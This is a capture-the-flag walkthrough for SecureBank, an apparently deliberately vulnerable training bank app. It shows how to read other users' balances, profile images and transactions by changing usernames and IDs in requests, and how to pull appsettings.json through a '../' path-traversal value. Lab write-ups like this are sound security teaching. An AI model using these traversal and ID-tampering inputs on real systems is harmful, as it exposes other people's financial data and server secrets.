Challenges
To solve these challenges, we need to manually look inside the requests of SecureBank.
Last updated
To solve these challenges, we need to manually look inside the requests of SecureBank.
Last updated
In case of database breach, all users will have their passwords leaked. Because the server is saving passwords in plaintext, the attacker won’t have to brute force password hashes. Passwords should always be salted and then hashed with a strong hashing algorithm, in order to protect our users to best of our ability.
We can immediately see that we have two network requests in which the user is passed as a parameter.
This request accepts username and returns the balance of the account. By changing the username, we can get the account balance of other users.
In request change /User/GetAvailbleFunds?user={username}
In this challenge, you need to get another user's profile image.
In request change user to desired username/User/ProfileImage?user={username}.
The project is created using an MVC CRUD pattern. If responses are filtered only on the table page, we might miss the enumeration of the models produced by the CRUD pattern. In our case, transactions are refined in the first table by the logged user. When choosing the action, we can notice that there is some ID in the URL. If we change ID, we can enumerate it and view all the transactions created in the SecureBank.
Go to /Transaction/Details/{transaction id}
Try to change the transaction id until you get a transaction that belongs to another user.
You will find the flag in the response header.
Looking further into the request, we can notice the ProfileImage returns file. Trying to change the username to the file path, we immediately see some unusual behavior. Recognizing that this is a .NET Core application, we can attempt to get an appsetting.json file located on the path../appsettings.jsonor ../../appsettings.jsondepending on the system the app is running.
You know that the application framework is .Net Core, so you are looking for appsettings.json.
Go to /api/User/ProfileImage?user={username} and depending on how the application is hosted, set username to ../appsettings.json or ../../appsettings.json
You will find the flag in the response header.
